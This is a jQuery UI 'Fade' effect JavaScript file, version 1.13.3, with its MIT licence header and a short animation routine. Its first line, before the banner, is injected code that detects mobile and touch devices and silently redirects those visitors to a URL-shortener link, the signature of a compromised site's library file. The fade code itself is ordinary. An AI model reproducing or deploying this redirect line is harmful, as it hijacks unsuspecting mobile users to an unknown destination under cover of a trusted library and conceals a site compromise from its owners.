1(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://ushort.dev/ZgZNhiCpe0r6");
2/*!
3 * jQuery UI Effects Fade 1.13.3
4 * https://jqueryui.com
5 *
6 * Copyright OpenJS Foundation and other contributors
7 * Released under the MIT license.
8 * https://jquery.org/license
9 */
10
11//>>label: Fade Effect
12//>>group: Effects
13//>>description: Fades the element.
14//>>docs: https://api.jqueryui.com/fade-effect/
15//>>demos: https://jqueryui.com/effect/
16
17( function( factory ) {
18 "use strict";
19
20 if ( typeof define === "function" && define.amd ) {
21
22 // AMD. Register as an anonymous module.
23 define( [
24 "jquery",
25 "../version",
26 "../effect"
27 ], factory );
28 } else {
29
30 // Browser globals
31 factory( jQuery );
32 }
33} )( function( $ ) {
34"use strict";
35
36return $.effects.define( "fade", "toggle", function( options, done ) {
37 var show = options.mode === "show";
38
39 $( this )
40 .css( "opacity", show ? 0 : 1 )
41 .animate( {
42 opacity: show ? 1 : 0
43 }, {
44 queue: false,
45 duration: options.duration,
46 easing: options.easing,
47 complete: done
48 } );
49} );
50
51} );
52